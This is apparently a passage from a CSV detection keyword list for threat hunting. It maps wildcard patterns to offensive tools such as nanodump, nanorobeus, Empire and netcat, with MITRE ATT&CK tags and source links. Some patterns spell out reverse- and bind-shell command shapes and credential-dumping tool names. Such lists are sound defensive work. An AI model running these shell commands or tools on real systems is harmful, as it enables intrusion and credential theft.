+"*nanodump_ppl.x64.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*nanodump_ppl_dump*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump_ppl_dump.x64*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump_ppl_dump.x86*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump_ppl_medic*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump_ppl_medic.x64*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump_ppl_medic.x86*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump_ssp*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*nanodump_ssp*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump_ssp.x64*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump_ssp.x64.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*nanodump_ssp.x64.dll*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump_ssp.x86*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanodump_ssp_embedded.*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*NanoDumpChoose*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*nanodump-pipes*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*NanoDumpWriteDump*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*nanorobeus*_cs.x64.*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*nanorobeus*_cs.x86.*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*nanorobeus*dump*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*nanorobeus.cna*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*nanorobeus.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*nanorobeus.x64*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*nanorobeus.x64.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*nanorobeus.x86*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*nanorobeus_brc4*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*nanorobeus64*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*nanorobeus86*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*nanorobeus-main*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*nanorubeus.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*Narasimha1997/fake-sms*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","8","10","2514","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" +"*NativeEasyHook32.dll*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*NativeEasyHook64.dll*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*Naughty-Script.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*nbcojefnccbanplpoffopkoepjmhgdgh*","greyware_tool_keyword","Hoxx VPN Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*NBNSBruteForceHost*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*NBNSBruteForcePause*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*NBNSBruteForceSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*NBNSBruteForceTarget*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*nbnsspoof.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*NBNSSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*nbtscan -r */24*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*nbtscan -r */24*","greyware_tool_keyword","nbtscan","smb enumeration","T1135 - T1046","TA0007 - TA0009","N/A","N/A","discovery","https://github.com/charlesroelli/nbtscan","1","0","N/A","5","2","124","23","2016-05-26T20:16:52Z","2016-05-26T20:16:33Z" +"*nbtstat -n*","greyware_tool_keyword","nbtstat","Displays the NetBIOS name table of the local computer. The status of registered indicates that the name is registered either by broadcast or with a WINS server.","T1049 - T1018 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/nbtstat","1","0","N/A","4","10","N/A","N/A","N/A","N/A" +"*nc * -e /bin/bash*","greyware_tool_keyword","netcat","netcat shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*nc 127.0.0.1 4000*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" +"*nc -l -p * -e *.bat*","greyware_tool_keyword","nc","Netcat Realy on windows - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*nc -l -p * -e /bin/bash*","greyware_tool_keyword","nc","Netcat Backdoor on Linux - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*nc -l -p * -e cmd.exe*","greyware_tool_keyword","nc","Netcat Backdoor on Windows - create a relay that sends packets from the local port to a netcat client connecte to the target ip on the targeted port","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*nc -nlvp 4444*","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","shell spawning","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","0","N/A","N/A","1","56","11","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" +"*nc -u -lvp *","greyware_tool_keyword","netcat","netcat shell listener","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*nc -v -n -z -w1 *-*","greyware_tool_keyword","nc","Port scanner with netcat","T1046","TA0007","N/A","N/A","Network Exploitation Tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*nc -vlp 4444*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*nc -vlp 4445*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*nc -z -v * *","greyware_tool_keyword","nc","netcat common arguments","T1090.001 - T1021.001","TA0011 - TA0040","N/A","N/A","Network Exploitation Tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nc.exe 127.0.0.1 4444*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*nc.exe -l -p 1337*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*ncat * -e /bin/bash*","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*ncat * -p 4444*","greyware_tool_keyword","ncat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Network Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*ncat --udp * -e /bin/bash*","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*nccgroup/demiguise*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","1","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"*ncrack-*.dmg*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential 